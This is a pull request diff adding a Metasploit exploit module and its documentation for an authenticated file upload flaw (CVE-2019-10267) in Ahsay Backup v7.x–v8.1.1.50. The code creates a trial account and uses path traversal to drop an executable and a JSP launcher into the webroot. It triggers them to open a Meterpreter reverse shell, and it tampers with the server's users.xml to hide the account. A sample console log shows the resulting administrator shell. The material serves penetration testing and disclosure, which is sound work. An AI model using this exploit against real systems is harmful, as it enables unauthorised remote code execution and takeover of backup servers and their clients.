### PR TITLE
Ahsay backup v7.x - v8.1.1.50 file upload

### DIFF
--- a/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md
+++ b/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md
@@ -1,0 +1,57 @@
+## Vulnerable Application
+  Ahsay Backup v7.x - v8.1.1.50
+  Download the vulnerable version: `http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe`
+  Start the application ( I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`)
+  
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploit/windows/misc/ahsay_fileupload`
+  3. enable create trial account `set CREATEACCOUNT true`
+  4. set RHOST `set RHOST 172.16.238.175` 
+  5. set LHOST `set LHOST 172.16.238.235`
+  6. run exploit `run`
+  7. We should receive a meterpreter shell.
+
+## Options
+
+   CREATEACCOUNT  - Create a Trial account, use this when trial accounts is enabled and you do not have a valid credentials.
+   PASSWORD       - Password to Ahsay useraccount, if CREATEACCOUNT is set this password will be used.
+   RHOST          - Target address.
+   RPORT          - The target port (TCP).
+   TARGETURI      - Path to Ahsay installation
+   UPLOADPATH     - Path to where the file should be uploaded
+   USERNAME       - Username to Ahsay account, if CREATEACCOUNT is set this username will be used.
+   
+## Scenarios
+
+### Version of software and OS as applicable
+
+This exploit has been tested on Windows 2003 SP2.
+
+  ```
+msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
+CREATEACCOUNT => true
+msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
+RHOST => 172.16.238.175
+msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
+LHOST => 172.16.238.235
+msf exploit(windows/misc/ahsay_fileupload) > run
+
+[*] Started reverse TCP handler on 172.16.238.235:4444 
+[+] Username and password are valid!
+[+] No need to create account, already exists!
+[*] Uploading payload
+[+] Succesfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
+[*] Uploading payload
+[+] Succesfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
+[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
+[+] Exploit executed!
+[*] Sending stage (179779 bytes) to 172.16.238.175
+[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
+[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
+[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target
+
+meterpreter > getuid
+Server username: AHSAY-123\Administrator
+  ```

--- a/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
+++ b/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
@@ -79,40 +79,6 @@ class MetasploitModule < Msf::Exploit::Remote
       ])
   end
 
-  def check
-    trial_enabled = is_trial_enabled?
-    username = datastore['USERNAME']
-    password = datastore['PASSWORD']
-    if trial_enabled and datastore['CREATEACCOUNT'] == "true"
-      if username == "" or password == ""
-        print_status("Please set a username and password")
-        return Exploit::CheckCode::Unknown
-      else
-        # print_status("create account")
-        return Exploit::CheckCode::Vulnerable
-      end
-    elsif username != "" and password != ""
-      if check_account?
-        print_status("Username and password are valid")
-        return Exploit::CheckCode::Vulnerable
-      else
-        print_status("Username and password are invalid")
-        if trial_enabled
-          print_status("Server supports trial accounts, you can create an account!")
-        end
-        return Exploit::CheckCode::Unknown
-      end
-    elsif trial_enabled
-      print_status("Server supports trial accounts, try creating an account")
-      return Exploit::CheckCode::Unknown
-    else
-      print_status("Server does not support trial accounts, use a valid username and password.")
-      return Exploit::CheckCode::Fail
-    end
-
-    # return Exploit::CheckCode::Unknown
-  end
-
   def is_trial_enabled?
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','isTrialEnabled'),
@@ -139,9 +105,12 @@ class MetasploitModule < Msf::Exploit::Remote
       return true
     elsif res and res.code == 500 and "USER_NOT_EXIST" =~ /#{res.body}/
       # fail_with(Failure::NoAccess, 'Username incorrect!')
+      print_status("Username does not exist.")
       return false
     elsif res and res.code == 500 and "PASSWORD_INCORRECT" =~ /#{res.body}/
-      fail_with(Failure::NoAccess, 'Username exists but password incorrect!')
+      # fail_with(Failure::NoAccess, 'Username exists but password incorrect!')
+      print_status("Username exists but password incorrect!")
+      return false
     else
       return false
     end
@@ -213,12 +182,12 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-
   def remove_account
     if datastore['CREATEACCOUNT']
-      print_status("Looking for account")
-      xml_doc = download("../../conf/users.xml")
       username = datastore['USERNAME']
+      users_xml = "../../conf/users.xml"
+      print_status("Looking for account #{username} in #{users_xml}")
+      xml_doc = download(users_xml)
       xmldoc = Document.new(xml_doc)
       el = 0
       xmldoc.elements.each("Setting/Key") do |e|
@@ -226,16 +195,17 @@ class MetasploitModule < Msf::Exploit::Remote
           e.elements.each("Value") do |a|
               if a.attributes["name"].include?('name')
                   if a.attributes["data"].include?(username)
-                      print_status("Found account")
+                      print_good("Found account")
                       xmldoc.root.elements.delete el
                       print_status("Removed account")
-
                   end
               end
           end
       end
       new_xml = xmldoc.root
-      upload("../../conf/users.xml", new_xml.to_s)
+      print_status("Uploading new #{users_xml} file")
+      upload(users_xml, new_xml.to_s)
+      print_good("Account is inaccesible when service restarts!")
     end
   end
 
@@ -252,18 +222,24 @@ class MetasploitModule < Msf::Exploit::Remote
     exploitpath = exploitpath.gsub("/","\\\\\\")
     requestpath = path.gsub("../../webapps/",'')
 
+    #First stage payload creation and upload
     exe = payload.encoded_exe
     exe_filename = Rex::Text.rand_text_alpha(10)
     exefileLocation = "#{path}/#{exe_filename}.exe"
+    print_status("Uploading first stage payload.")
     upload(exefileLocation, exe)
     #../../webapps/cbs/help/en
     exec = %Q{<% Runtime.getRuntime().exec(getServletContext().getRealPath("/") + "#{exploitpath}\\\\#{exe_filename}.exe");%>}
 
+    #Second stage payload creation and upload
     jsp_filename = Rex::Text.rand_text_alpha(10)
     jspfileLocation = "#{path}/#{jsp_filename}.jsp"
+    print_status("Uploading second stage payload.")
     upload(jspfileLocation, exec)
     proto = ssl ? 'https' : 'http'
     url = "#{proto}://#{datastore['RHOST']}:#{datastore['RPORT']}" + normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp")
+
+    #Triggering the exploit
     print_status("Triggering exploit! #{url}" )
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp"),
@@ -274,14 +250,15 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     #Cleaning up
+    print_status("Cleaning up after our selfs.")
     remove_account
+    print_status("Trying to remove #{exefileLocation}, but will fail when in use.")
     delete(exefileLocation)
     delete(jspfileLocation)
     delete("../../user/#{datastore['USERNAME']}",true)
   end
 
   def upload(fileLocation, content)
-    print_status("Uploading payload")
     username = Rex::Text.encode_base64(datastore['USERNAME'])
     password = Rex::Text.encode_base64(datastore['PASSWORD'])
     uploadPath = Rex::Text.encode_base64(fileLocation)
@@ -298,7 +275,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'timeout' => 20
     })
     if res && res.code == 201
-      print_good("Succesfully uploaded #{fileLocation}")
+      print_good("Succesfully uploaded file to #{fileLocation}")
     else
       fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
     end
@@ -348,5 +325,68 @@ class MetasploitModule < Msf::Exploit::Remote
     if res and res.code == 200
       res.body
     end
+  end
+
+  def check
+    #We need a cookie first
+    cookie_res = send_request_cgi({
+      #/cbs/system/ShowDownload.do
+      'uri' => normalize_uri(target_uri.path, 'cbs','system','ShowDownload.do'),
+      'method' => 'GET'
+    })
+
+    if cookie_res and cookie_res.code == 200
+      cookie = cookie_res.get_cookies.split()[0]
+    else
+      return Exploit::CheckCode::Unknown
+    end
+
+    if defined?(cookie)
+      #request the page with all the clientside software links.
+      headers = {}
+      headers['Cookie'] = cookie
+      link = send_request_cgi({
+        #/cbs/system/ShowDownload.do
+        'uri' => normalize_uri(target_uri.path, 'cbs','system','download','indexTab1.jsp'),
+        'method' => 'GET',
+        'headers' => headers
+      })
+
+      if link and link.code == 200
+        link.body.each_line do |line|
+          #looking for the link that contains obm-linux and ends with .sh
+          if line.include? '<a href="/cbs/download/' and line.include? '.sh' and line.include? 'obm-linux'
+            filename = line.split("<a")[1].split('"')[1].split("?")[0]
+            filecontent = send_request_cgi({
+              #/cbs/system/ShowDownload.do
+              'uri' => normalize_uri(target_uri.path, filename),
+              'method' => 'GET',
+              'headers' => headers
+            })
+            if filecontent and filecontent.code == 200
+              filecontent.body.each_line do |l|
+                if l.include? 'VERSION="'
+                  number = l.split("=")[1].split('"')[1]
+                  if number.match /(\d+\.)?(\d+\.)?(\d+\.)?(\*|\d+)$/
+                    if number <= '8.1.1.50' and not number < '7'
+                      return Exploit::CheckCode::Appears
+                    else
+                      return Exploit::CheckCode::Safe
+                    end
+                  end
+                end
+              end
+            else
+              return Exploit::CheckCode::Unknown
+            end
+          end
+        end
+      else
+        return Exploit::CheckCode::Unknown
+      end
+    else
+      return Exploit::CheckCode::Unknown
+    end
+
   end
 end

--- a/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
+++ b/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
@@ -25,6 +25,10 @@ class MetasploitModule < Msf::Exploit::Remote
        flaw all connected clients can be configured to execute a command before
        the backup starts. Allowing an attacker to takeover even more systems
        and make it rain shells!
+
+       Setting the CREATEACCOUNT to true will create a new account, this is
+       enabled by default.
+       If credeantials are known enter these and run the exploit.
       },
       'Author'       =>
         [
@@ -67,8 +71,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(443),
         OptString.new('TARGETURI', [true, 'Path to Ahsay', '/']),
-        OptString.new('USERNAME', [true, 'Username for the new account', Rex::Text.rand_text_alphanumeric(8)]),
-        OptString.new('PASSWORD', [true, 'Password for the new account', Rex::Text.rand_text_alphanumeric(12) + Rex::Text.rand_char("","!@#$%^&*()_+/?")]),
+        OptString.new('USERNAME', [true, 'Username for the (new) account', Rex::Text.rand_text_alphanumeric(8)]),
+        OptString.new('PASSWORD', [true, 'Password for the (new) account', Rex::Text.rand_text_alphanumeric(12) + Rex::Text.rand_char("","!$%^&*")]),
         OptString.new('CREATEACCOUNT', [false, 'Create Trial account', 'false']),
         OptString.new('UPLOADPATH', [false, 'Payload Path', '../../webapps/cbs/help/en']),
 
@@ -79,7 +83,6 @@ class MetasploitModule < Msf::Exploit::Remote
     trial_enabled = is_trial_enabled?
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
-
     if trial_enabled and datastore['CREATEACCOUNT'] == "true"
       if username == "" or password == ""
         print_status("Please set a username and password")
@@ -89,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
         return Exploit::CheckCode::Vulnerable
       end
     elsif username != "" and password != ""
-      if check_account?()
+      if check_account?
         print_status("Username and password are valid")
         return Exploit::CheckCode::Vulnerable
       else
@@ -112,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def is_trial_enabled?
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','is_trial_enabled'),
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','isTrialEnabled'),
       'method' => 'POST',
       'data'   => ''
     })
@@ -157,14 +160,14 @@ class MetasploitModule < Msf::Exploit::Remote
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
 
-    if is_trial_enabled?() and datastore['CREATEACCOUNT'] == "true"
+    if is_trial_enabled? and datastore['CREATEACCOUNT'] == "true"
       if username == "" or password == ""
         fail_with(Failure::NoAccess, 'Please set a username and password')
       else
         #check if account does not exists?
-        if !check_account?()
+        if !check_account?
           # Create account and check if it is valid
-          if createAccount?()
+          if create_account?
             drop_and_execute()
           else
             fail_with(Failure::NoAccess, 'Failed to authenticate')
@@ -176,10 +179,10 @@ class MetasploitModule < Msf::Exploit::Remote
         end
       end
     elsif username != "" and password != ""
-      if check_account?()
+      if check_account?
         drop_and_execute()
       else
-        if is_trial_enabled?()
+        if is_trial_enabled?
           fail_with(Failure::NoAccess, 'Username and password are invalid. But server supports trial accounts, you can create an account!')
         end
         fail_with(Failure::NoAccess, 'Username and password are invalid')
@@ -211,7 +214,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def prepare_path(path)
-    # path = datastore['UPLOADPATH']
     if path.end_with? '/'
       path = path.chomp('/')
     end
@@ -235,7 +237,7 @@ class MetasploitModule < Msf::Exploit::Remote
     jspfileLocation = "#{path}/#{jsp_filename}.jsp"
     upload(jspfileLocation, exec)
     proto = ssl ? 'https' : 'http'
-    url = "#{proto}#{datastore['RHOST']}:#{datastore['RPORT']}" + normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp")
+    url = "#{proto}://#{datastore['RHOST']}:#{datastore['RPORT']}" + normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp")
     print_status("Triggering exploit! #{url}" )
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp"),

--- a/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
+++ b/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
@@ -5,10 +5,10 @@
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
-
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
+  include REXML
 
   def initialize(info = {})
     super(update_info(info,
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
         Opt::RPORT(443),
         OptString.new('TARGETURI', [true, 'Path to Ahsay', '/']),
         OptString.new('USERNAME', [true, 'Username for the (new) account', Rex::Text.rand_text_alphanumeric(8)]),
-        OptString.new('PASSWORD', [true, 'Password for the (new) account', Rex::Text.rand_text_alphanumeric(12) + Rex::Text.rand_char("","!$%^&*")]),
+        OptString.new('PASSWORD', [true, 'Password for the (new) account', Rex::Text.rand_text_alpha(8) + Rex::Text.rand_text_numeric(5) + Rex::Text.rand_char("","!$%^&*")]),
         OptString.new('CREATEACCOUNT', [false, 'Create Trial account', 'false']),
         OptString.new('UPLOADPATH', [false, 'Payload Path', '../../webapps/cbs/help/en']),
 
@@ -213,6 +213,32 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
+
+  def remove_account
+    if datastore['CREATEACCOUNT']
+      print_status("Looking for account")
+      xml_doc = download("../../conf/users.xml")
+      username = datastore['USERNAME']
+      xmldoc = Document.new(xml_doc)
+      el = 0
+      xmldoc.elements.each("Setting/Key") do |e|
+          el = el + 1
+          e.elements.each("Value") do |a|
+              if a.attributes["name"].include?('name')
+                  if a.attributes["data"].include?(username)
+                      print_status("Found account")
+                      xmldoc.root.elements.delete el
+                      print_status("Removed account")
+
+                  end
+              end
+          end
+      end
+      new_xml = xmldoc.root
+      upload("../../conf/users.xml", new_xml.to_s)
+    end
+  end
+
   def prepare_path(path)
     if path.end_with? '/'
       path = path.chomp('/')
@@ -246,6 +272,12 @@ class MetasploitModule < Msf::Exploit::Remote
     if res and res.code == 200
       print_good("Exploit executed!")
     end
+
+    #Cleaning up
+    remove_account
+    delete(exefileLocation)
+    delete(jspfileLocation)
+    delete("../../user/#{datastore['USERNAME']}",true)
   end
 
   def upload(fileLocation, content)
@@ -262,9 +294,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','upload'),
       'method' => 'PUT',
       'headers' => headers,
-      'data' => content
+      'data' => content,
+      'timeout' => 20
     })
-    register_file_for_cleanup(fileLocation)
     if res && res.code == 201
       print_good("Succesfully uploaded #{fileLocation}")
     else
@@ -272,4 +304,49 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
+  def download(fileLocation)
+    #TODO make vars_get variable
+    print_status("Downloading file")
+    username = Rex::Text.encode_base64(datastore['USERNAME'])
+    password = Rex::Text.encode_base64(datastore['PASSWORD'])
+    headers = {}
+    headers['X-RSW-Request-0'] = username
+    headers['X-RSW-Request-1'] = password
+    res = send_request_cgi({
+      #/obs/obm7/file/download?X-RSW-custom-encode-path=../../conf/users.xml
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','download'),
+      'method' => 'GET',
+      'headers' => headers,
+      'vars_get' => {
+        'X-RSW-custom-encode-path' => fileLocation
+      }
+    })
+
+    if res and res.code == 200
+      res.body
+    end
+  end
+
+  def delete(fileLocation, recursive=false)
+    print_status("Deleting file #{fileLocation}")
+    username = Rex::Text.encode_base64(datastore['USERNAME'])
+    password = Rex::Text.encode_base64(datastore['PASSWORD'])
+    headers = {}
+    headers['X-RSW-Request-0'] = username
+    headers['X-RSW-Request-1'] = password
+    res = send_request_cgi({
+      #/obs/obm7/file/delete?X-RSW-custom-encode-path=../../user/xyz
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','delete'),
+      'method' => 'DELETE',
+      'headers' => headers,
+      'vars_get' => {
+        'X-RSW-custom-encode-path' => fileLocation,
+        'recursive' => recursive
+      }
+    })
+
+    if res and res.code == 200
+      res.body
+    end
+  end
 end

--- a/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
+++ b/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
@@ -68,7 +68,7 @@ It can be exploited in Windows and Linux environments to get remote code executi
   end
 
   def check
-    trialEnabled = isTrialEnabled?()
+    trialEnabled = isTrialEnabled?
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
 
@@ -102,7 +102,7 @@ It can be exploited in Windows and Linux environments to get remote code executi
     # return Exploit::CheckCode::Unknown
   end
 
-  def is_trial_enabled?()
+  def is_trial_enabled?
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','isTrialEnabled'),
       'method' => 'POST',

--- a/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
+++ b/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
@@ -1,0 +1,270 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Ahsay Backup v7.x - v8.1.1.50 (authenticated) file upload',
+      'Description' => %q{
+       This module exploits an authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute the upload credentials are needed, default on Ahsay Backup trial accounts are enabled so an account can be created.
+
+It can be exploited in Windows and Linux environments to get remote code execution (usualy as SYSTEM). This module has been tested successfully on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this flaw all connected clients can be configured to execute a command before the backup starts. Allowing an attacker to takeover even more systems and make it rain shells!
+      },
+      'Author'       =>
+        [
+          'Wietse Boonstra'
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2019-10267'],
+          [ 'URL', 'https://www.wbsec.nl/Ahsay_vulnerabilities' ],
+          [ 'URL', 'http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe' ]
+        ],
+      'Privileged'  => true,
+      'Platform'    => 'win',
+      'DefaultOptions' => {
+        'RPORT' => 443,
+        'SSL' => true,
+        'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+      },
+      'Targets'     =>
+        [
+          [  'Windows x86',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Linux x86', # should work but untested
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux'
+            },
+          ],
+
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 1 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'Path to Ahsay', '/']),
+        OptString.new('USERNAME', [true, 'Username to Ahsay', 'ahsay01']),
+        OptString.new('PASSWORD', [true, 'Password to Ahsay', 'Ahsay01!']),
+        OptString.new('CREATEACCOUNT', [false, 'Create Trial account', 'false']),
+        OptString.new('UPLOADPATH', [false, 'Payload Path', '../../webapps/cbs/help/en']),
+
+      ])
+  end
+
+  def check
+    trialEnabled = isTrialEnabled?()
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    if trialEnabled and datastore['CREATEACCOUNT'] == "true"
+      if username == "" or password == ""
+        print_status("Please set a username and password")
+        return Exploit::CheckCode::Unknown
+      else
+        # print_status("create account")
+        return Exploit::CheckCode::Vulnerable
+      end
+    elsif username != "" and password != ""
+      if checkAccount?()
+        print_status("Username and password are valid")
+        return Exploit::CheckCode::Vulnerable
+      else
+        print_status("Username and password are invalid")
+        if trialEnabled
+          print_status("Server supports trial accounts, you can create an account!")
+        end
+        return Exploit::CheckCode::Unknown
+      end
+    elsif trialEnabled
+      print_status("Server supports trial accounts, try creating an account")
+      return Exploit::CheckCode::Unknown
+    else
+      print_status("Server does not support trial accounts, use a valid username and password.")
+      return Exploit::CheckCode::Fail
+    end
+
+    # return Exploit::CheckCode::Unknown
+  end
+
+  def is_trial_enabled?()
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','isTrialEnabled'),
+      'method' => 'POST',
+      'data'   => ''
+    })
+    if res and res.code == 200 and "ENABLED" =~ /#{res.body}/
+      return true
+    else
+      return false
+    end
+  end
+
+  def check_account?()
+    headers = create_request_headers()
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','getUserProfile'),
+      'method' => 'POST',
+      'data'   => '',
+      'headers' => headers
+    })
+    if res and res.code == 200
+      print_good("Username and password are valid!")
+      return true
+    elsif res and res.code == 500 and "USER_NOT_EXIST" =~ /#{res.body}/
+      # fail_with(Failure::NoAccess, 'Username incorrect!')
+      return false
+    elsif res and res.code == 500 and "PASSWORD_INCORRECT" =~ /#{res.body}/
+      fail_with(Failure::NoAccess, 'Username exists but password incorrect!')
+    else
+      return false
+    end
+  end
+
+  def create_request_headers()
+    headers = {}
+    username = Rex::Text.encode_base64(datastore['USERNAME'])
+    password = Rex::Text.encode_base64(datastore['PASSWORD'])
+    headers['X-RSW-custom-encode-username'] = username
+    headers['X-RSW-custom-encode-password'] = password
+    headers
+  end
+
+  def exploit
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    if isTrialEnabled?() and datastore['CREATEACCOUNT'] == "true"
+      if username == "" or password == ""
+        fail_with(Failure::NoAccess, 'Please set a username and password')
+      else
+        #check if account does not exists?
+        if !checkAccount?()
+          # Create account and check if it is valid
+          if createAccount?()
+            drop_and_execute()
+          else
+            fail_with(Failure::NoAccess, 'Failed to authenticate')
+          end
+        else
+          #Need to fix, check if account exist
+          print_good("No need to create account, already exists!")
+          drop_and_execute()
+        end
+      end
+    elsif username != "" and password != ""
+      if checkAccount?()
+        drop_and_execute()
+      else
+        if isTrialEnabled?()
+          fail_with(Failure::NoAccess, 'Username and password are invalid. But server supports trial accounts, you can create an account!')
+        end
+        fail_with(Failure::NoAccess, 'Username and password are invalid')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'Missing some settings')
+    end
+  end
+
+  def create_account?()
+    headers = create_request_headers()
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','addTrialUser'),
+      'method' => 'POST',
+      'data'   => '',
+      'headers' => headers
+    })
+    # print (res.body)
+    if res and res.code == 200
+      print_good("Account created")
+      return true
+    elsif "LOGIN_NAME_IS_USED" =~ /#{res.body}/
+      fail_with(Failure::NoAccess, 'Username is in use!')
+    elsif "PWD_COMPLEXITY_FAILURE" =~ /#{res.body}/
+      fail_with(Failure::NoAccess, 'Password not complex enough')
+    else
+      fail_with(Failure::UnexpectedReply, 'Something went wrong!')
+    end
+  end
+
+  def prepare_path(path)
+    # path = datastore['UPLOADPATH']
+    if path.end_with? '/'
+      path = path.chomp('/')
+    end
+    path
+  end
+
+  def drop_and_execute()
+    path = prepare_path(datastore['UPLOADPATH'])
+    exploitpath = path.gsub("../../webapps/cbs/",'')
+    exploitpath = exploitpath.gsub("/","\\\\\\")
+    requestpath = path.gsub("../../webapps/",'')
+
+    exe = payload.encoded_exe
+    exe_filename = Rex::Text.rand_text_alpha(10)
+    exefileLocation = "#{path}/#{exe_filename}.exe"
+    upload(exefileLocation, exe)
+    #../../webapps/cbs/help/en
+    exec = %Q{<% Runtime.getRuntime().exec(getServletContext().getRealPath("/") + "#{exploitpath}\\\\#{exe_filename}.exe");%>}
+
+    jsp_filename = Rex::Text.rand_text_alpha(10)
+    jspfileLocation = "#{path}/#{jsp_filename}.jsp"
+    upload(jspfileLocation, exec)
+    if datastore['SSL']
+      proto = "https://"
+    else
+      proto = "http://"
+    end
+    url = "#{proto}#{datastore['RHOST']}:#{datastore['RPORT']}" + normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp")
+    print_status("Triggering exploit! #{url}" )
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp"),
+      'method' => 'GET'
+    })
+    if res and res.code == 200
+      print_good("Exploit executed!")
+    end
+  end
+
+  def upload(fileLocation, content)
+    print_status("Uploading payload")
+    username = Rex::Text.encode_base64(datastore['USERNAME'])
+    password = Rex::Text.encode_base64(datastore['PASSWORD'])
+    uploadPath = Rex::Text.encode_base64(fileLocation)
+
+    headers = {}
+    headers['X-RSW-Request-0'] = username
+    headers['X-RSW-Request-1'] = password
+    headers['X-RSW-custom-encode-path'] = uploadPath
+    payload = "test"
+    res = send_request_raw({
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','upload'),
+      'method' => 'PUT',
+      'headers' => headers,
+      'data' => content
+    })
+    register_file_for_cleanup(fileLocation)
+    if res && res.code == 201
+      print_good("Succesfully uploaded #{fileLocation}")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
+    end
+  end
+
+end

--- a/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
+++ b/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
@@ -12,11 +12,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'Ahsay Backup v7.x - v8.1.1.50 (authenticated) file upload',
+      'Name'        => 'Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload',
       'Description' => %q{
-       This module exploits an authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute the upload credentials are needed, default on Ahsay Backup trial accounts are enabled so an account can be created.
+       This module exploits an authenticated insecure file upload and code
+       execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute
+       the upload credentials are needed, default on Ahsay Backup trial
+       accounts are enabled so an account can be created.
 
-It can be exploited in Windows and Linux environments to get remote code execution (usualy as SYSTEM). This module has been tested successfully on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this flaw all connected clients can be configured to execute a command before the backup starts. Allowing an attacker to takeover even more systems and make it rain shells!
+       It can be exploited in Windows and Linux environments to get remote code
+       execution (usualy as SYSTEM). This module has been tested successfully
+       on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this
+       flaw all connected clients can be configured to execute a command before
+       the backup starts. Allowing an attacker to takeover even more systems
+       and make it rain shells!
       },
       'Author'       =>
         [
@@ -226,11 +234,7 @@ It can be exploited in Windows and Linux environments to get remote code executi
     jsp_filename = Rex::Text.rand_text_alpha(10)
     jspfileLocation = "#{path}/#{jsp_filename}.jsp"
     upload(jspfileLocation, exec)
-    if datastore['SSL']
-      proto = "https://"
-    else
-      proto = "http://"
-    end
+    proto = ssl ? 'https' : 'http'
     url = "#{proto}#{datastore['RHOST']}:#{datastore['RPORT']}" + normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp")
     print_status("Triggering exploit! #{url}" )
     res = send_request_cgi({

--- a/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
+++ b/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
@@ -115,8 +115,8 @@ It can be exploited in Windows and Linux environments to get remote code executi
     end
   end
 
-  def check_account?()
-    headers = create_request_headers()
+  def check_account?
+    headers = create_request_headers
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','getUserProfile'),
       'method' => 'POST',
@@ -136,7 +136,7 @@ It can be exploited in Windows and Linux environments to get remote code executi
     end
   end
 
-  def create_request_headers()
+  def create_request_headers
     headers = {}
     username = Rex::Text.encode_base64(datastore['USERNAME'])
     password = Rex::Text.encode_base64(datastore['PASSWORD'])
@@ -181,8 +181,8 @@ It can be exploited in Windows and Linux environments to get remote code executi
     end
   end
 
-  def create_account?()
-    headers = create_request_headers()
+  def create_account?
+    headers = create_request_headers
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','addTrialUser'),
       'method' => 'POST',
@@ -193,9 +193,9 @@ It can be exploited in Windows and Linux environments to get remote code executi
     if res and res.code == 200
       print_good("Account created")
       return true
-    elsif "LOGIN_NAME_IS_USED" =~ /#{res.body}/
+    elsif res.body.include?('LOGIN_NAME_IS_USED')
       fail_with(Failure::NoAccess, 'Username is in use!')
-    elsif "PWD_COMPLEXITY_FAILURE" =~ /#{res.body}/
+    elsif res.body.include?('PWD_COMPLEXITY_FAILURE')
       fail_with(Failure::NoAccess, 'Password not complex enough')
     else
       fail_with(Failure::UnexpectedReply, 'Something went wrong!')
@@ -252,7 +252,6 @@ It can be exploited in Windows and Linux environments to get remote code executi
     headers['X-RSW-Request-0'] = username
